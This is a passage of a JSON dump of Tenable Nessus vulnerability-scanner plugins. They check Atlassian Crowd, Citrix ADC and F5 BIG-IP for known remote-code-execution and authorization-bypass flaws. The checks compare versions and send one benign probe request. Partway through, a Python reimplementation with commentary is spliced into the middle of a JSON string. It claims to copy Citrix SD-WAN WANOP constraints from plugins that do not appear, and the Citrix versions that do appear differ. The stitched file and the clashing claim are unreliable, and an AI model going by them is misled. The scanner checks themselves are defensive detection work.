script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) 
vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary\nplugins, which permits remote code execution.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.corben.io/atlassian-crowd-rce/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\nappname = 'Atlassian Crowd';\napp_id = 'crowd';\n\n# Exit if app is not detected on the target\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:8095);\ninstall = get_single_install(app_name:app_id, webapp:TRUE, port:port);\n\nbase_path = install['path'];\nurl = '/admin/uploadplugin.action';\n\nres = http_send_recv3(\n method : 'POST',\n port : port,\n item : base_path + url,\n exit_on_fail : TRUE\n);\n\nif ('400' >< res[0] && ('Unable to install plugin' >< res[2] || 'All plugins could not be validated' >< res[2]))\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : res[0] + res[2]\n );\n}\nelse\n{\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(qs:install['path'], port:port));\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-28T13:14:27", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. 
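The plugins above use two different decision rules: the Citrix SD-WAN WANOP and Crowd version plugins compare a self-reported version against min/fixed constraints, while the CVE-2019-11580 direct check sends an empty POST to /admin/uploadplugin.action and treats HTTP 400 with an "Unable to install plugin" style message as evidence that the pdkinstall endpoint is exposed. The Python below reimplements both rules as an added example; it is not Tenable's code and does not run any NASL. The constraint tables are copied from the plugins, and the loopback stub server is a constructed stand-in for a Crowd instance so the check runs offline; nothing is uploaded or executed.

```python
"""Version-range and direct-check detection for the plugins above (added example, not Tenable's NASL).

version_in_affected_range() applies min/fixed constraints the way the Citrix
SD-WAN WANOP and Atlassian Crowd plugins do; a letter suffix such as "11.0.3d"
sorts after the bare number, so 11.0.3 is below the 11.0.3d fix while 11.0.3d is not.
crowd_direct_check() sends the empty POST to /admin/uploadplugin.action used by the
CVE-2019-11580 direct check and reports vulnerable on HTTP 400 plus a marker string.
The stub server is a constructed stand-in so the check runs offline; it is not Crowd.
"""
import re
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

_COMPONENT_RE = re.compile(r"(\d+)([A-Za-z]*)")


def version_key(version: str) -> tuple:
    """'11.0.3d' -> ((11, ''), (0, ''), (3, 'd')); suffix letters sort after the bare number."""
    key = []
    for part in version.strip().split("."):
        m = _COMPONENT_RE.fullmatch(part)
        if not m:
            raise ValueError(f"unparseable version component: {part!r}")
        key.append((int(m.group(1)), m.group(2).lower()))
    return tuple(key)


def version_in_affected_range(version: str, constraints) -> bool:
    """True when min_version <= version < fixed_version for any constraint."""
    v = version_key(version)
    return any(version_key(c["min_version"]) <= v < version_key(c["fixed_version"])
               for c in constraints)


# Constraints copied from the two plugins above.
CITRIX_SDWAN_WANOP = [
    {"min_version": "10.2.0", "fixed_version": "10.2.7"},
    {"min_version": "11.0.0", "fixed_version": "11.0.3d"},
    {"min_version": "11.1.0", "fixed_version": "11.1.1a"},
]
ATLASSIAN_CROWD = [
    {"min_version": "2.1.0", "fixed_version": "3.0.5"},
    {"min_version": "3.1.0", "fixed_version": "3.1.6"},
    {"min_version": "3.2.0", "fixed_version": "3.2.8"},
    {"min_version": "3.3.0", "fixed_version": "3.3.5"},
    {"min_version": "3.4.0", "fixed_version": "3.4.4"},
]

UPLOAD_PATH = "/admin/uploadplugin.action"
VULNERABLE_MARKERS = ("Unable to install plugin", "All plugins could not be validated")


def crowd_direct_check(base_url: str, timeout: float = 5.0) -> bool:
    """Same rule as the NASL: empty POST; HTTP 400 plus a marker string means the endpoint is exposed."""
    req = urllib.request.Request(base_url.rstrip("/") + UPLOAD_PATH, data=b"", method="POST")
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # never route via a proxy
    try:
        with opener.open(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        status, body = err.code, err.read().decode("utf-8", "replace")
    return status == 400 and any(marker in body for marker in VULNERABLE_MARKERS)


class _StubCrowd(BaseHTTPRequestHandler):
    """Constructed stand-in: when `vulnerable` is set, answers like an exposed pdkinstall endpoint."""
    vulnerable = True

    def do_POST(self):
        if self.path == UPLOAD_PATH and self.vulnerable:
            status, body = 400, b"Unable to install plugin"
        else:
            status, body = 404, b"Not Found"
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence request logging
        pass


def run_against_stub(vulnerable: bool) -> bool:
    """Bind the stub to a free loopback port, run the direct check against it, tear it down."""
    handler = type("Stub", (_StubCrowd,), {"vulnerable": vulnerable})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return crowd_direct_check(f"http://127.0.0.1:{server.server_port}")
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("Citrix 11.0.3 affected:", version_in_affected_range("11.0.3", CITRIX_SDWAN_WANOP))
    print("Crowd 3.4.4 affected:", version_in_affected_range("3.4.4", ATLASSIAN_CROWD))
    print("stub (vulnerable):", run_against_stub(True))
    print("stub (patched):", run_against_stub(False))
```

The version rule is what makes the "self-reported version" plugins cheap but fallible: they trust whatever the device advertises, and a suffix like "3d" or "1a" has to sort correctly or 11.0.3 slips past as fixed. The direct check is the stronger signal, because it observes the endpoint's behaviour rather than a version string, but it is also a request the target's logs will record; run it only against hosts you are authorized to test.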
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-28T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2022-01-25T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_3_4_4.NASL", "href": "https://www.tenable.com/plugins/nessus/125477", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125477);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/25\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected\nby a remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is 2.1.x prior\nto 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 \nor 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution\n(RCE) vulnerability. 
An unauthenticated, remote attacker can exploit this, by\nusing pdkinstall development plugin, to install arbitrary plugins, which permits\nremote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nport = get_http_port(default:8095);\n\napp = \"crowd\";\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.1.0\", \"fixed_version\" : \"3.0.5\" },\n { \"min_version\" : \"3.1.0\", \"fixed_version\" : \"3.1.6\" },\n { \"min_version\" : \"3.2.0\", \"fixed_version\" : \"3.2.8\" },\n { \"min_version\" : \"3.3.0\", \"fixed_version\" : \"3.3.5\" },\n { \"min_version\" : \"3.4.0\", \"fixed_version\" : \"3.4.4\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-23T14:53:10", "description": "The version of Citrix ADC or Citrix NetScaler Gateway SSL VPN running on the remote web server is affected by an authorization bypass vulnerability. 
An unauthenticated remote attacker with access to the NSIP/management interface can exploit this to bypass authorization.\n\nPlease refer to advisory CTX276688 for more information.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"}, "published": "2020-07-30T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Multiple Vulnerabilities (CTX276688) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8193"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/o:citrix:netscaler_access_gateway_firmware"], "id": "CITRIX_CTX276688_DIRECT_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/139082", "sourceData": "Binary data citrix_CTX276688_direct_check.nbin", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-11T16:41:42", "description": "The remote Citrix ADC or Citrix NetScaler Gateway device is version 10.5.x prior to 10.5.70.18, 11.1.x prior to 11.1.64.14, 12.0.x prior to 12.0.63.21, 12.1.x prior to 12.1.57.18 or 13.0.x prior to 13.0.58.30. It is, therefore, affected by multiple vulnerabilities:\n\n - An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices. An unauthenticated remote attacker with access to the NSIP/management interface can exploit this to bypass authorization. (CVE-2020-8193)\n\n - A code injection vulnerability exists in Citrix ADC and NetScaler Gateway devices. An unauthenticated remote attacker with access to the NSIP/management interface can exploit this to create a malicious file which, if executed by a victim on the management network, could allow the attacker arbitrary code execution in the context of that user. (CVE-2020-8194)\n\n - A cross-site scripting vulnerability exists in Citrix ADC and NetScaler Gateway devices. An unauthenticated remote attacker can exploit this convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser session. 
(CVE-2020-8191, CVE-2020-8198)\n\nIn addition, Citrix ADC and Citrix NetScaler Gateway are also affected by several additional vulnerabilities including configuration-dependent privilege escalations, information disclosures, and a denial of service vulnerability. \n\nPlease refer to advisory CTX276688 for more information.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-08T00:00:00", "type": "nessus", "title": "Citrix ADC and Citrix NetScaler Gateway Multiple Vulnerabilities (CTX276688)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-18177", "CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "modified": "2022-01-21T00:00:00", "cpe": ["cpe:2.3:h:citrix:netscaler_gateway:*:*:*:*:*:*:*:*", "cpe:2.3:h:citrix:netscaler_application_delivery_controller:*:*:*:*:*:*:*:*"], "id": "CITRIX_NETSCALER_CTX276688.NASL", "href": "https://www.tenable.com/plugins/nessus/138212", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138212);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\n \"CVE-2019-18177\",\n \"CVE-2020-8187\",\n \"CVE-2020-8190\",\n \"CVE-2020-8191\",\n \"CVE-2020-8193\",\n \"CVE-2020-8194\",\n \"CVE-2020-8195\",\n \"CVE-2020-8196\",\n \"CVE-2020-8197\",\n \"CVE-2020-8198\",\n \"CVE-2020-8199\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0286-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Citrix ADC and Citrix NetScaler Gateway Multiple Vulnerabilities (CTX276688)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix 
ADC or Citrix NetScaler Gateway device is version 10.5.x prior to 10.5.70.18, 11.1.x prior to \n11.1.64.14, 12.0.x prior to 12.0.63.21, 12.1.x prior to 12.1.57.18 or 13.0.x prior to 13.0.58.30. It is, therefore, \naffected by multiple vulnerabilities:\n\n - An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices. An \n unauthenticated remote attacker with access to the NSIP/management interface can exploit this to bypass \n authorization. (CVE-2020-8193)\n\n - A code injection vulnerability exists in Citrix ADC and NetScaler Gateway devices. An unauthenticated \n remote attacker with access to the NSIP/management interface can exploit this to create a malicious file\n which, if executed by a victim on the management network, could allow the attacker arbitrary code execution\n in the context of that user. (CVE-2020-8194)\n\n - A cross-site scripting vulnerability exists in Citrix ADC and NetScaler Gateway devices. An\n unauthenticated remote attacker can exploit this convincing a user to click a specially crafted URL, to \n execute arbitrary script code in a user's browser session. (CVE-2020-8191, CVE-2020-8198)\n\nIn addition, Citrix ADC and Citrix NetScaler Gateway are also affected by several additional vulnerabilities including \nconfiguration-dependent privilege escalations, information disclosures, and a denial of service vulnerability. 
\n\nPlease refer to advisory CTX276688 for more information.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX276688\");\n script_set_attribute(attribute:\"solution\", value:\n\"For versions 10.5.x, 11.1.x, 12.0.x, 12.1.x and 13.0.x, upgrade to 10.5.70.18, 11.1.64.14, 12.0.63.21, 12.1.57.18 and \n13.0.58.30, or later, respectively.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8197\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:citrix:netscaler_gateway\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:citrix:netscaler_application_delivery_controller\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_netscaler_detect.nbin\");\n script_require_keys(\"Host/NetScaler/Detected\");\n\n exit(0);\n}\ninclude('vcf_extras_netscaler.inc');\n\nvar app_info = vcf::citrix_netscaler::get_app_info();\n\nvar constraints = [\n {'min_version': '10.5', 'fixed_version': '10.5.70.18', 'fixed_display': '10.5-70.18'},\n {'min_version': '11.1', 'fixed_version': '11.1.64.14', 'fixed_display': '11.1-64.14'},\n {'min_version': '12.0', 'fixed_version': '12.0.63.21', 'fixed_display': '12.0-63.21'},\n {'min_version': '12.1', 'fixed_version': '12.1.57.18', 'fixed_display': '12.1-57.18'},\n {'min_version': '13.0', 'fixed_version': '13.0.58.30', 'fixed_display': '13.0-58.30'}\n];\n\nvcf::citrix_netscaler::check_version_and_report(\n app_info: app_info,\n constraints: constraints,\n severity: SECURITY_WARNING\n);\n", "cvss": {"score": 6.5, "vector": "CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T14:57:25", "description": "CVE-2015-4852 Java applications that have an endpoint that accepts serialized Java objects, an attacker can combine serializable collections to create arbitrary remote code execution. Based on the FoxGlove, an attack can be done via RMI or HTTP. The vulnerability is actually in InvokerTransformer class. If class path exists for commons-collections or commons-collections4, the vulnerability exits in the application.\n\nApache Collections-580 - Arbitrary remote code execution with InvokerTransformer With InvokerTransformer, serializable collections can be build that execute arbitrary Java code.\nsun.reflect.annotation.AnnotationInvocationHandler#readObject invokes #entrySet and #get on a deserialized collection. If you have an endpoint that accepts serialized Java objects (JMX, RMI, remote EJB, ...) 
you can combine the two to create arbitrary remote code execution vulnerability.", "cvss3": {"score": null, "vector": null}, "published": "2015-12-17T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Java commons-collections library vulnerability (K30518307)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL30518307.NASL", "href": "https://www.tenable.com/plugins/nessus/87432", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K30518307.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87432);\n script_version(\"2.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2015-4852\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"F5 Networks BIG-IP : Java commons-collections library vulnerability (K30518307)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2015-4852 Java applications that have an endpoint that 
accepts\nserialized Java objects, an attacker can combine serializable\ncollections to create arbitrary remote code execution. Based on the\nFoxGlove, an attack can be done via RMI or HTTP. The vulnerability is\nactually in InvokerTransformer class. If class path exists for\ncommons-collections or commons-collections4, the vulnerability exits\nin the application.\n\nApache Collections-580 - Arbitrary remote code execution with\nInvokerTransformer With InvokerTransformer, serializable collections\ncan be build that execute arbitrary Java code.\nsun.reflect.annotation.AnnotationInvocationHandler#readObject invokes\n#entrySet and #get on a deserialized collection. If you have an\nendpoint that accepts serialized Java objects (JMX, RMI, remote EJB,\n...) you can combine the two to create arbitrary remote code execution\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://issues.apache.org/jira/browse/COLLECTIONS-580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K30518307\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K30518307.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - Raw Object');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K30518307\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.3.0-11.6.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.4.0-11.6.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.0\",\"10.1.0-10.2.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.0\",\"10.1.0-10.2.4\");\n\n# 